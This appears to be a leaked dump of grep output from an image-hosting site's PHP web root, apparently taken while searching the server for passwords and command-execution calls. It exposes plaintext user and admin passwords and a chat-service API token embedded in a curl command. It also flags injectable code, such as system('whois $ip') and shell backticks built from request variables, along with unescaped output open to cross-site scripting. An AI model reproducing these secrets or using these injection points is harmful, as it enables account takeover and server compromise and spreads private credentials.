/home/image/www/setlogin.php:function pass_crypt($password)
/home/image/www/setlogin.php: $hash = md5($password);
/home/image/www/setlogin.php:$a_password = pass_crypt(param('a_password'));
/home/image/www/setlogin.php:if (strlen($a_username) > 0 && strlen($a_passwo
rd) > 0)
/home/image/www/setlogin.php: $a_password));
/home/image/www/testmail2.php: 'password' => 'changeme'
/home/image/www/upload_api.php: } elseif( $_REQUEST['a_username'] && $_REQU
EST['a_password'] ) {
/home/image/www/upload_api.php: if ($cookie || $email || $a_username || $a_
password)
/home/image/www/upload_api.php: if ($a_password)
/home/image/www/upload_api.php: $a_password = pass_crypt($a_passwor
d);
/home/image/www/upload_api.php: $a_password
));
/home/image/www/users.php: $users['user1'] = array('id' => '16', 'passwor
d' => 'spuswepr', 'locale' => 'phi');
/home/image/www/users.php: $users['user2'] = array('id' => '17', 'passwor
d' => 'spebumat', 'locale' => 'phi');
/home/image/www/users.php: $users['user3'] = array('id' => '18', 'passwor
d' => 'prapegay', 'locale' => 'phi');
/home/image/www/users.php: $users['user4'] = array('id' => '19', 'passwor
d' => 'hubuvabu', 'locale' => 'phi');
/home/image/www/users.php: $users['user5'] = array('id' => '20', 'passwor
d' => 'crefadeh', 'locale' => 'phi');
/home/image/www/users.php: $users['user6'] = array('id' => '21', 'passwor
d' => 'crefadeh', 'locale' => 'phi');
/home/image/www/users.php: $users['user7'] = array('id' => '22', 'passwor
d' => 'sadgewbb', 'locale' => 'phi');
/home/image/www/users.php: $users['user8'] = array('id' => '23', 'passwor
d' => 'fghwefad', 'locale' => 'phi');
/home/image/www/users.php: $users['user9'] = array('id' => '24', 'passwor
d' => 'hjkrtyrh', 'locale' => 'phi');
/home/image/www/users.php: $users['user10'] = array('id' => '25', 'passwo
rd' => 'kjhewufe', 'locale' => 'phi');
/home/image/www/users.php: $users['user11'] = array('id' => '26', 'passwo
rd' => '3umaWEwr', 'locale' => 'phi');
/home/image/www/users.php: $users['user12'] = array('id' => '27', 'passwo
rd' => 'RUp3atRe', 'locale' => 'phi');
/home/image/www/users.php: $users['user13'] = array('id' => '28', 'passwo
rd' => 'prA43zas', 'locale' => 'phi');
/home/image/www/users.php: $users['user14'] = array('id' => '29', 'passwo
rd' => 's5U2ezeT', 'locale' => 'phi');
/home/image/www/users.php: $users['user15'] = array('id' => '30', 'passwo
rd' => 'h9fr3heW', 'locale' => 'phi');
/home/image/www/users.php: $users['user16'] = array('id' => '31', 'passwo
rd' => '2reDrujA', 'locale' => 'phi');
/home/image/www/users.php: $users['user17'] = array('id' => '32', 'passwo
rd' => 'b4SUpuja', 'locale' => 'phi');
/home/image/www/users.php: $users['user18'] = array('id' => '33', 'passwo
rd' => 'Pr8thufa', 'locale' => 'phi');
/home/image/www/users.php: $users['user19'] = array('id' => '34', 'passwo
rd' => 'B3azU9Ef', 'locale' => 'phi');
/home/image/www/users.php: $users['user20'] = array('id' => '35', 'passwo
rd' => 'mustu9H7', 'locale' => 'phi');
/home/image/www/users.php: $users['user21'] = array('id' => '36', 'passwo
rd' => 'SpuphE7e', 'locale' => 'phi');
/home/image/www/users.php: $users['user22'] = array('id' => '37', 'passwo
rd' => 'CRa65Pra', 'locale' => 'phi');
/home/image/www/users.php: $users['user23'] = array('id' => '38', 'passwo
rd' => 'TAqA7a8u', 'locale' => 'phi');
/home/image/www/users.php: $users['user24'] = array('id' => '39', 'passwo
rd' => 'ga4ufReq', 'locale' => 'phi');
/home/image/www/users.php: $users['user25'] = array('id' => '40', 'passwo
rd' => 'cE7axebr', 'locale' => 'phi');
/home/image/www/users.php: $users['user26'] = array('id' => '41', 'passwo
rd' => 'Kucr8has', 'locale' => 'phi');
/home/image/www/users.php: $users['user27'] = array('id' => '42', 'passwo
rd' => 'tRAb7eHe', 'locale' => 'phi');
/home/image/www/users.php: $users['user28'] = array('id' => '43', 'passwo
rd' => 'zam3B8uJ', 'locale' => 'phi');
/home/image/www/users.php: $users['user29'] = array('id' => '44', 'passwo
rd' => 'tusTe4he', 'locale' => 'phi');
/home/image/www/users.php: $users['user30'] = array('id' => '45', 'passwo
rd' => 'fru9rUsP', 'locale' => 'phi');
/home/image/www/users.php: $users['imageshack'] = array('id' => '46', 'pa
ssword' => 'lololol', 'locale' => 'usa', 'admin' => 1);
/home/image/www/users.php: if (isset($users[$http_user]) && $users[$http_
user]['password'] == $http_pass) {
/home/image/www/users_v2.php: $users['user1'] = array('id' => '16', 'pass
word' => 'spuswepr', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user2'] = array('id' => '17', 'pass
word' => 'spebumat', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user3'] = array('id' => '18', 'pass
word' => 'prapegay', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user4'] = array('id' => '19', 'pass
word' => 'hubuvabu', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user5'] = array('id' => '20', 'pass
word' => 'crefadeh', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user6'] = array('id' => '21', 'pass
word' => 'crefadeh', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user7'] = array('id' => '22', 'pass
word' => 'sadgewbb', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user8'] = array('id' => '23', 'pass
word' => 'fghwefad', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user9'] = array('id' => '24', 'pass
word' => 'hjkrtyrh', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user10'] = array('id' => '25', 'pas
sword' => 'kjhewufe', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user11'] = array('id' => '26', 'pas
sword' => '3umaWEwr', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user12'] = array('id' => '27', 'pas
sword' => 'RUp3atRe', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user13'] = array('id' => '28', 'pas
sword' => 'prA43zas', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user14'] = array('id' => '29', 'pas
sword' => 's5U2ezeT', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user15'] = array('id' => '30', 'pas
sword' => 'h9fr3heW', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user16'] = array('id' => '31', 'pas
sword' => '2reDrujA', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user17'] = array('id' => '32', 'pas
sword' => 'b4SUpuja', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user18'] = array('id' => '33', 'pas
sword' => 'Pr8thufa', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user19'] = array('id' => '34', 'pas
sword' => 'B3azU9Ef', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user20'] = array('id' => '35', 'pas
sword' => 'mustu9H7', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user21'] = array('id' => '36', 'pas
sword' => 'SpuphE7e', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user22'] = array('id' => '37', 'pas
sword' => 'CRa65Pra', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user23'] = array('id' => '38', 'pas
sword' => 'TAqA7a8u', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user24'] = array('id' => '39', 'pas
sword' => 'ga4ufReq', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user25'] = array('id' => '40', 'pas
sword' => 'cE7axebr', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user26'] = array('id' => '41', 'pas
sword' => 'Kucr8has', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user27'] = array('id' => '42', 'pas
sword' => 'tRAb7eHe', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user28'] = array('id' => '43', 'pas
sword' => 'zam3B8uJ', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user29'] = array('id' => '44', 'pas
sword' => 'tusTe4he', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['user30'] = array('id' => '45', 'pas
sword' => 'fru9rUsP', 'locale' => 'phi');
/home/image/www/users_v2.php: $users['imageshack'] = array('id' => '46',
'password' => 'lololol', 'locale' => 'usa', 'admin' => 1);
/home/image/www/users_v2.php: if (isset($users[$http_user]) && $users[$ht
tp_user]['password'] == $http_pass) {
/home/image/www/watch.php:bot.login :method => :login, :username => "email@y
ou.com", :password => "secret", :room => "34567"
# grep popen /home/image/www/*.php -C2
/home/image/www/notify.php-
/home/image/www/notify.php-
/home/image/www/notify.php:# $fh = popen('/usr/sbin/sendmail -t -oi -f bo
unces@imageshack.us', 'w');
/home/image/www/notify.php-# fwrite($fh, $message);
/home/image/www/notify.php-# pclose($fh);
# grep 'system(' /home/image/www/*.php -C2
/home/image/www/cwho.php-A whois of the IP address yields the following resu
lts:\n\n";
/home/image/www/cwho.php-
/home/image/www/cwho.php:system("whois $ip");
/home/image/www/cwho.php-
/home/image/www/cwho.php-?>
# grep 'txt' /home/image/www/*.php
/home/image/www/annopic.php:href=annopic.php?thispic=$thispic&edit=1&bgc
=$bgc&lin=$lin&txt=$txt&bor=$bor&tss=$tss>Edit
/home/image/www/annopic.php:<input type=\"hidden\" name=\"txt\" value=\"$txt
\" />
/home/image/www/c_mod.php:file_put_contents("/home/image/www/check_mod.txt",
"$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/c_mod.php: file_put_contents("/home/image/www/check_mod_mobi
le.txt","$current_time $file $timestamp $service $info $country\n", FILE_APP
END);
/home/image/www/check.php:file_put_contents("/home/image/www/check_mod.txt",
"$current_time $timestamp $service $info\n", FILE_APPEND);
/home/image/www/check_mod.php:file_put_contents("/home/image/www/check_mod.t
xt","$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/check_mod.php: file_put_contents("/home/image/www/check_mod_
mobile.txt","$current_time $file $timestamp $service $info $country\n", FILE
_APPEND);
/home/image/www/convo.php: `/usr/bin/curl -u be651a30591d2cf1428683182136173
ad1ffcd23:X https://imageshack.campfirenow.com/room/$room/recent.xml 2>/dev/
null | grep datetime | cut -d">" -f2 | cut -d"<" -f1 > /home/image/www/$room
.txt`;
/home/image/www/convo.php: $dates = file("/home/image/www/$room.txt", FILE_I
GNORE_NEW_LINES);
/home/image/www/convo.php:`cp /home/image/www/convo.txt /home/image/www/conv
o.old`;
/home/image/www/convo.php:file_put_contents("/home/image/www/convo.txt",$mes
sage);
/home/image/www/convo.php:$new = trim(file_get_contents("/home/image/www/con
vo.txt"));
/home/image/www/deletefailed.php: file_put_contents("/home/image/www/delete
fail.txt",$send_number);
/home/image/www/deletefailed.php: file_put_contents("/home/image/www/delete
fail.txt","");
/home/image/www/formstyle.php:body, p, td {color: #<?php echo $txt; ?>;}
/home/image/www/formstyle.php: color: #<?php echo $txt; ?>;
/home/image/www/grand.php: $data[$table] = csvtoarray("/home/image/www/routi
ng.txt");
/home/image/www/grand.php: $data[$table] = csvtoarray("http://img974.imagesh
ack.us/reginfo.txt");
/home/image/www/guestembed.php:echo "<p><b>Guestbook</b> $lock_it<br><a href
=$gal_owner_host/read_msgs.php?gal=$owner_gal_file&bgc=$bgc&lin=$lin
&txt=$txt&bor=$bor>See All Photoblog Comments</a></p>";
/home/image/www/guestembed.php:echo "<p><b>Guestbook</b> $lock_it<br><a href
=$loc_host/img_proxy.php?url=$gal_owner_host/read_msgs.php?gal=$owner_gal_fi
le&bgc=$bgc&lin=$lin&txt=$txt&bor=$bor>See All Photoblog Com
ments</a></p>";
/home/image/www/guestembed.php:echo "<input tyle=\"text\" size=\"20\" class=
\"txtfield\" name=\"username\"> Your Name<br />";
/home/image/www/guestembed.php:<textarea class=\"txtfield\" rows=\"5\" cols=
\"50\" name=\"annotate\"></textarea>
/home/image/www/guestembed.php:<input class=\"txtfield\" type=\"submit\" val
ue=\" Post \" >
/home/image/www/iframe.php:$txtcolor=strip_tags($txtcolor);
/home/image/www/iframe.php:if (strlen($txtcolor) > 6 || !$txtcolor) $txtcolo
r="000000";
/home/image/www/iframe.php:<span style="color: #<?php echo $txtcolor; ?>">pa
tience during upload</span><br />
/home/image/www/insert_to_queue.php:file_put_contents("/home/image/www/check
_mod.txt","$current_time $file $timestamp $service $info\n", FILE_APPEND);
/home/image/www/insert_to_queue.php: file_put_contents("/home/image/www/chec
k_mod_mobile.txt","$current_time $file $timestamp $service $info $country\n"
, FILE_APPEND);
/home/image/www/ipb.php: <iframe src="http://www.imageshack.us/iframe.php?tx
tcolor=111111" scrolling="no" frameborder="0" width="280" height="70">
/home/image/www/make_qr.php:$hostnames = file("http://gslb.imageshack.us/nam
ecell.txt", FILE_IGNORE_NEW_LINES);
/home/image/www/pop.php:$list = explode("\n",trim(`for i in \`tail -100 /hom
e/image/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; d
one | sort | uniq -c | sort -n | tac | awk '{print \$2}'`));
/home/image/www/popcheck.php:$list = explode("\n",trim(`for i in \`cat /home
/image/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; do
ne | sort -n | uniq`));
/home/image/www/popular.php:file_put_contents("/home/image/www/popular.txt",
$timestamp."\n",FILE_APPEND);
/home/image/www/rater.php:$txt = param('txt', '111111');
/home/image/www/rater.php: body, p, td {color: #<?= $txt ?>}
/home/image/www/rater.php:<input type="hidden" name="txt" value="<?= $txt ?>
"/>
/home/image/www/routing_collector.php:file_put_contents("/home/image/www/rou
ting.txt",$routing_table);
/home/image/www/sm.php:<br /><textarea cols="90" rows="4">echo '<iframe src=
"http://imageshack.us/iframe.php?txtcolor=111111&type=blank" scrolling="no"
frameborder="0" width="280" height="70"> You must have an iframe-compatable
browser to view the ImageShack.us upload form.</iframe>';</textarea><br />
/home/image/www/unpop.php:$list = explode("\n",trim(`for i in \`cat /home/im
age/www/popular.txt\`; do date -d @\$i '+%m-%d-%y/%R' | sed 's/:/-/g'; done
| sort | uniq -c | sort -n | tac | awk '{print \$2}'`));
/home/image/www/uploads.php:file_put_contents("/home/image/www/uploadchange.
txt",$final);
/home/image/www/vb.php:<iframe src="http://imageshack.us/iframe.php?txtcolor
=111111" scrolling="no" allowtransparency="true" frameborder="0" width="280"
height="70"> You must
/home/image/www/vpn_onsite_collector.php: file_put_contents("/home/im
age/www/onsite.txt",$_POST[onsite_number]);
# grep '\.file' /home/image/www/*.php
/home/image/www/403.php: header('Content-length: '.filesize($pic));
/home/image/www/c_mod.php: if( file_exists("/disk2/reports/$service/$day/$h
our_minute.file") ){ //check if the file is unmoderated
/home/image/www/c_mod.php: if( file_exists("/disk2/re
ports/imageshack/$day/$hour_minute.file") ){
/home/image/www/c_mod.php: echo "found: /disk2/reports/$service/$day/$hour
_minute.file";
/home/image/www/check.php: echo "/disk2/reports/$service/$day/$hour_minute.f
ile";
/home/image/www/check.php: if(file_exists("/disk2/reports/$service/$day/$ho
ur_minute.file")){ //check if the file is unmoderated
/home/image/www/check_mod.php: if( file_exists("/disk2/reports/$service/$da
y/$hour_minute.file") ){ //check if the file is unmoderated
/home/image/www/check_mod.php: if( file_exists("/disk
2/reports/imageshack/$day/$hour_minute.file") ){
/home/image/www/contact_new.php: file_put_contents("/home/image/www/en/t
obedeleted.file", $listDelete, FILE_APPEND);
/home/image/www/contact_new.php: file_put_contents("/home/image/www/en/torre
ntdeletes.file", $torDelete, FILE_APPEND);
/home/image/www/contact_old.php: $tobelog = "/home/image/www/en/tobedelet
ed.file";
/home/image/www/contact_old.php: $torlog = "/home/image/www/en/torrentdelete
s.file";
/home/image/www/csvtohtml.php: $partners = file_get_contents("/home/image/ww
w/partners.file");
/home/image/www/dnsfunctions.php: $objects = @file("../objects.file");
/home/image/www/dnsfunctions.php: $data = @file("sagoip.file");
/home/image/www/edit_rotate.php: $resp = $client->call("imageapi.v4.i
mage.change.filesize",
/home/image/www/modpanel.php:$whitelist = file("/home/image/whitelist.file",
FILE_IGNORE_NEW_LINES);
/home/image/www/modpanel.php: $illegal_line = trim(`cat $fullpath/$s_serv
ice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel.php: `cat $fullpath/$s_service/$sday/$stime.file >>
/disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel.php: `rm -f $fullpath/$s_service/$sday/$stime.file`
;
/home/image/www/modpanel.php: $time = str_replace(".file","",array_pop($loca
tion_array));
/home/image/www/modpanel1.php:$whitelist = file("/home/image/whitelist.file"
, FILE_IGNORE_NEW_LINES);
/home/image/www/modpanel1.php: $illegal_line = trim(`cat $fullpath/$s_ser
vice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel1.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel1.php: `rm -f $fullpath/$s_service/$sday/$stime.file
`;
/home/image/www/modpanel1.php: $time = str_replace(".file","",array_pop($loc
ation_array));
/home/image/www/modpanel2.php:$whitelist = file("/home/image/whitelist.file"
, FILE_IGNORE_NEW_LINES);
/home/image/www/modpanel2.php: $illegal_line = trim(`cat $fullpath/$s_ser
vice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel2.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel2.php: `cat $fullpath/$s_service/$sday/$stime.file >
> /disk2/reports/hbase_insert/moderated`;
/home/image/www/modpanel2.php: `rm -f $fullpath/$s_service/$sday/$stime.file
`;
/home/image/www/modpanel2.php: $time = str_replace(".file","",array_pop($loc
ation_array));
/home/image/www/modpanel_v2.php:$whitelist = file("/home/image/whitelist.fil
e", FILE_IGNORE_NEW_LINES);
/home/image/www/modpanel_v2.php: $illegal_line = trim(`cat $fullpath/$s_s
ervice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel_v2.php: `cat $fullpath/$s_service/$sday/$stime.file
>> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel_v2.php: `rm -f $fullpath/$s_service/$sday/$stime.fi
le`;
/home/image/www/modpanel_v2.php: $time = str_replace(".file","",array_pop($l
ocation_array));
/home/image/www/modpanel_v3.php:$whitelist = file("/home/image/whitelist.fil
e", FILE_IGNORE_NEW_LINES);
/home/image/www/modpanel_v3.php: $illegal_line = trim(`cat $fullpath/$s_s
ervice/$sday/$stime.file | grep $grep`)."\n";
/home/image/www/modpanel_v3.php: `cat $fullpath/$s_service/$sday/$stime.file
>> /disk2/reports/$s_service/$sday/$stime.$local_auth[username]`;
/home/image/www/modpanel_v3.php: `rm -f $fullpath/$s_service/$sday/$stime.fi
le`;
/home/image/www/modpanel_v3.php: $time = str_replace(".file","",array_pop($l
ocation_array));
/home/image/www/pop.php: $file = "/disk2/reports/imageshack/$date.file";
/home/image/www/popcheck.php: $file = "/disk2/reports/imageshack/$date.file"
;
/home/image/www/reasons.php: $data[$date] = csvtoarray("http://gslb.imagesha
ck.us/csv/$table.file");
/home/image/www/remove_torrent.php: error_log("$hash\n",3,"/home/image/ww
w/en/torrentdeletes.file");
/home/image/www/unpop.php: $file = "/disk2/reports/imageshack/$date.file";
/home/image/www/write_import2.php:$file = "/disk2/reports/{$service}/{$day}/
{$hour}-{$minute}.file";
/home/image/www/write_import2.php: $next_file ="/disk2/reports/{$service}
/{$day}/{$next_hour}-{$next_minute}.file";
/home/image/www/write_import2.php: $next_file ="/disk2/reports/{$service}
/{$day}/{$hour}-{$next_minute}.file";
/home/image/www/write_import2.php:$hdfs = "/home/image/www/write_imports.fil
e";
/home/image/www/write_imports.php:$file = "/disk2/reports/{$service}/{$day}/
{$hour}-{$minute}.file";
/home/image/www/write_imports.php: $next_file ="/disk2/reports/{$service}
/{$day}/{$next_hour}-{$next_minute}.file";
/home/image/www/write_imports.php: $next_file ="/disk2/reports/{$service}
/{$day}/{$hour}-{$next_minute}.file";
/home/image/www/write_imports.php:$hdfs = "/home/image/www/write_imports.fil
e";
/home/image/www/write_imports2.php:$file = "/disk2/reports/$service/$day/$ho
ur_minute.file";
/home/image/www/write_imports2.php:$hdfs = "/home/image/www/write_imports.fi
le";
/home/image/www/write_imports_dev.php:$file = "/disk2/reports/{$service}/{$d
ay}/{$hour}-{$minute}.file";
/home/image/www/write_imports_dev.php:$file_yfrog2 = "/disk2/reports/yfrog_v
2/{$day}/{$hour}-{$minute}.file";
/home/image/www/write_imports_dev.php:$next_file ="/disk2/reports/{$service}
/{$day}/{$hour}-{$next_minute}.file";
/home/image/www/write_imports_dev.php:$next_file_yfrog2 ="/disk2/reports/yfr
og_v2/{$day}/{$hour}-{$next_minute}.file";
/home/image/www/write_imports_dev.php:$hdfs = "/home/image/www/write_imports
.file";
/home/image/www/yfrog_v2-sla.php: $partners = file_get_contents("/home/image
/www/partners.file");
# grep 'exec(' /home/image/www/*.php
/home/image/www/admob.php: $contents = curl_exec($request);
/home/image/www/affinity.php: $result = curl_exec($handle);
/home/image/www/bot.php: $result = curl_exec($ch);
/home/image/www/c_mod.php: $return = curl_exec($stream_curl_handle);
/home/image/www/c_mod.php: $return = curl_exec($stream_curl_handle);
/home/image/www/captcha.php:exec($cmd);
/home/image/www/check_mod.php: $return = curl_exec($stream_curl_handl
e);
/home/image/www/check_mod.php: $return = curl_exec($stream_curl_handl
e);
/home/image/www/convo.php: $result = curl_exec($ch);
/home/image/www/curlcheck.php: curl_exec($ch);
/home/image/www/domain.class.php: curl_exec($ch);
/home/image/www/dynamic-ad1.php: $response = curl_exec($ch);
/home/image/www/fullimg.php: $result = curl_exec($ch);
/home/image/www/functions.php: curl_exec($handle);
/home/image/www/functions.php: $r = curl_exec($ch);
/home/image/www/gal.php: $response = curl_exec($process);
/home/image/www/hbase_function.php: curl_exec($ch);
/home/image/www/insert_to_queue.php: $return = curl_exec($stream_curl
_handle);
/home/image/www/register_image.php: $response = curl_exec($process);
/home/image/www/shared_functions.php: curl_exec($ch);
/home/image/www/t_rift_h.php:$result = shell_exec('python /home/image/ex_re
port/bin/health_hbase.py') ;
/home/image/www/transload.php: $response = curl_exec($handle);
/home/image/www/transload.php:$rc = curl_exec($ch);
/home/image/www/videoupload.php: $result = curl_exec($ch);
/home/image/www/write_import2.php:$country = trim(curl_exec($ch));
/home/image/www/write_imports.php:$country = trim(curl_exec($ch));
/home/image/www/write_imports2.php:$country = curl_exec($ch);
/home/image/www/write_imports_dev.php: $country = trim(curl_exec($ch)
);
# grep in_array /home/image/www/*.php -C5
/home/image/www/403.php-
/home/image/www/403.php-$image = array_pop($url_vars);
/home/image/www/403.php-$hash = array_pop($url_vars);
/home/image/www/403.php-$host = str_replace("img","",array_pop($url_vars));
/home/image/www/403.php-
/home/image/www/403.php:if(in_array($image,$array) && $host == $id){
/home/image/www/403.php-
/home/image/www/403.php- $pic = "/home/image/www/scam.png";
/home/image/www/403.php- header('Content-type: image/png');
/home/image/www/403.php-
/home/image/www/403.php-} else {
--
/home/image/www/annopic.php- $gal = "http://$mygalarr[2].imageshack.us/$myga
larr[2]/$hash/$mygalarr[1].list";
/home/image/www/annopic.php- //echo $gal;
/home/image/www/annopic.php- // also need to check if this file in user's ga
llery
/home/image/www/annopic.php- $gal_arr = @file($gal);
/home/image/www/annopic.php- if($gal_arr)
/home/image/www/annopic.php: if(in_array($thispic."\n", $gal_arr)) { $edit_o
k = 1; }
/home/image/www/annopic.php- }
/home/image/www/annopic.php-}
/home/image/www/annopic.php-
/home/image/www/annopic.php-if($annotate && $auth == 1) {
/home/image/www/annopic.php-
--
/home/image/www/banpanel.php- if(trim($data)){
/home/image/www/banpanel.php-
/home/image/www/banpanel.php- $data = preg_replace('/\s/', ' ', $data);
/home/image/www/banpanel.php- list($timestamp,$megabytes,$file,$cookie,$size
,$error) = explode(" ",$data);
/home/image/www/banpanel.php-
/home/image/www/banpanel.php: if(in_array($file."\n",$unban_array)){ continu
e; }
/home/image/www/banpanel.php-
/home/image/www/banpanel.php- $megabytes = round($megabytes);
/home/image/www/banpanel.php- list($loc,$dir,$image) = explode("/",$file);
/home/image/www/banpanel.php- $human_timestamp = date("m-d-y H:i:s", $timest
amp);
/home/image/www/banpanel.php- $check_timestamp = date("m-d-y", $timestamp);
--
/home/image/www/deletecomment.php- $store_reply = null;
/home/image/www/deletecomment.php- $store_id = null;
/home/image/www/deletecomment.php- for ($i = 0; $i < count($feed->entries
); $i++)
/home/image/www/deletecomment.php- {
/home/image/www/deletecomment.php- $short_id = short_entry_id($feed,
$feed->entries[$i]);
/home/image/www/deletecomment.php: if (in_array($short_id, $id))
/home/image/www/deletecomment.php- {
/home/image/www/deletecomment.php- // let's check delete permissi
ons
/home/image/www/deletecomment.php- $authors = $feed->entries[$i]-
>authors;
/home/image/www/deletecomment.php-
/home/image/www/deletecomment.php- $allowed = $feed_owner;
--
/home/image/www/deletecommentgallery.php- error_log("BEFORE DELETE ".prin
t_r($id,1).": " . count($feed->entries));
/home/image/www/deletecommentgallery.php-
/home/image/www/deletecommentgallery.php- for ($i = 0; $i < count($feed->
entries); $i++)
/home/image/www/deletecommentgallery.php- {
/home/image/www/deletecommentgallery.php- $short_id = short_entry_id(
$feed, $feed->entries[$i]);
/home/image/www/deletecommentgallery.php: if (in_array($short_id, $id
))
/home/image/www/deletecommentgallery.php- {
/home/image/www/deletecommentgallery.php- // let's check delete p
ermissions
/home/image/www/deletecommentgallery.php- $authors = $feed->entri
es[$i]->authors;
/home/image/www/deletecommentgallery.php-
/home/image/www/deletecommentgallery.php- $allowed = $feed_owner;
--
/home/image/www/domain.class.php- $a = "*.{$d}";
/home/image/www/domain.class.php- $d = "{$c}.{$d}";
/home/image/www/domain.class.php- $A = preg_replace('/\.$/', '', $a);
/home/image/www/domain.class.php- $D = preg_replace('/\.$/', '', $d);
/home/image/www/domain.class.php-
/home/image/www/domain.class.php: if (in_array("!{$D}", $LIST))
/home/image/www/domain.class.php- {
/home/image/www/domain.class.php- $E = $D;
/home/image/www/domain.class.php- $E = preg_replace('/^([^\.])*\./', '',
$E);
/home/image/www/domain.class.php- break;
/home/image/www/domain.class.php- }
/home/image/www/domain.class.php: elseif (in_array($D, $LIST))
/home/image/www/domain.class.php- {
/home/image/www/domain.class.php- $E = $D;
/home/image/www/domain.class.php- }
/home/image/www/domain.class.php: elseif (in_array($A, $LIST))
/home/image/www/domain.class.php- {
/home/image/www/domain.class.php- $E = $D;
/home/image/www/domain.class.php- }
/home/image/www/domain.class.php- }
/home/image/www/domain.class.php- $this->etld = "{$E}.";
--
/home/image/www/guestembed.php- // check if owner
/home/image/www/guestembed.php- // $gal_arr already has a .list data
/home/image/www/guestembed.php- $ownergal = "http://$mygalarr[2].imageshack.
us/$mygalarr[2]/$hash/$mygalarr[1].list";
/home/image/www/guestembed.php- //$gal_arr = @file($ownergal);
/home/image/www/guestembed.php- if($gal_arr)
/home/image/www/guestembed.php: if(in_array($thispic."\n", $gal_arr))
{ $edit_ok = 1; }
/home/image/www/guestembed.php-
/home/image/www/guestembed.php-
/home/image/www/guestembed.php-// handle names without names
/home/image/www/guestembed.php-$personname = $name_arr[0];
/home/image/www/guestembed.php-$count = count($name_arr);
--
/home/image/www/register_image.php- {
/home/image/www/register_image.php- trace('Unable to retrieve XML pro
perties for :' . $l);
/home/image/www/register_image.php- return false;
/home/image/www/register_image.php- }
/home/image/www/register_image.php-
/home/image/www/register_image.php: if (in_array($ext, $VIDEO_FILE_EXTENS
IONS))
/home/image/www/register_image.php- {
/home/image/www/register_image.php- trace('Processing video file ' .
$l);
/home/image/www/register_image.php- if ($xml->getVideoStatus() == 'er
ror')
/home/image/www/register_image.php- {
/home/image/www/register_image.php- trace('Video ' . $l . ' is id
entified as error and will not be added to the list of user videos');
--
/home/image/www/upload_api.php- // identify if we know this content type an
d allow to upload such files
/home/image/www/upload_api.php- $swfuploader = param('swfupload');
/home/image/www/upload_api.php- if ($swfuploader != '1')
/home/image/www/upload_api.php- {
/home/image/www/upload_api.php- $content_type = $_FILES['fileupload']['t
ype'];
/home/image/www/upload_api.php: if (!in_array($content_type, $ACCEPTED_C
ONTENT_TYPES))
/home/image/www/upload_api.php- {
/home/image/www/upload_api.php- report_error('wrong_file_type', 'Wron
g file type detected for file ' . $fileupload_name . ':' . $content_type);
/home/image/www/upload_api.php- exit;
/home/image/www/upload_api.php- }
/home/image/www/upload_api.php- }
--
/home/image/www/write_import2.php-curl_setopt($ch, CURLOPT_TIMEOUT, 1);
/home/image/www/write_import2.php-curl_setopt($ch, CURLOPT_RETURNTRANSFER, T
RUE);
/home/image/www/write_import2.php-$country = trim(curl_exec($ch));
/home/image/www/write_import2.php-curl_close($ch);
/home/image/www/write_import2.php-
/home/image/www/write_import2.php:if(in_array($columnArray['api_key'],$yfrog
_array)){
/home/image/www/write_import2.php- $columnArray['from_api'] = 2;
/home/image/www/write_import2.php-}
/home/image/www/write_import2.php-
/home/image/www/write_import2.php-if(eregi("<",$country)){ $country = ""; }
/home/image/www/write_import2.php-
--
/home/image/www/write_imports.php-curl_setopt($ch, CURLOPT_TIMEOUT, 1);
/home/image/www/write_imports.php-curl_setopt($ch, CURLOPT_RETURNTRANSFER, T
RUE);
/home/image/www/write_imports.php-$country = trim(curl_exec($ch));
/home/image/www/write_imports.php-curl_close($ch);
/home/image/www/write_imports.php-
/home/image/www/write_imports.php:if(in_array($columnArray['api_key'],$yfrog
_array)){
/home/image/www/write_imports.php- $columnArray['from_api'] = 2;
/home/image/www/write_imports.php-}
/home/image/www/write_imports.php-
/home/image/www/write_imports.php-if(eregi("<",$country)){ $country = ""; }
/home/image/www/write_imports.php-
--
/home/image/www/write_imports2.php-$country = curl_exec($ch);
/home/image/www/write_imports2.php-curl_close($ch);
/home/image/www/write_imports2.php-
/home/image/www/write_imports2.php-//$country = trim(file_get_contents("http
://geo.imageshack.us/geoip?$ip"));
/home/image/www/write_imports2.php-
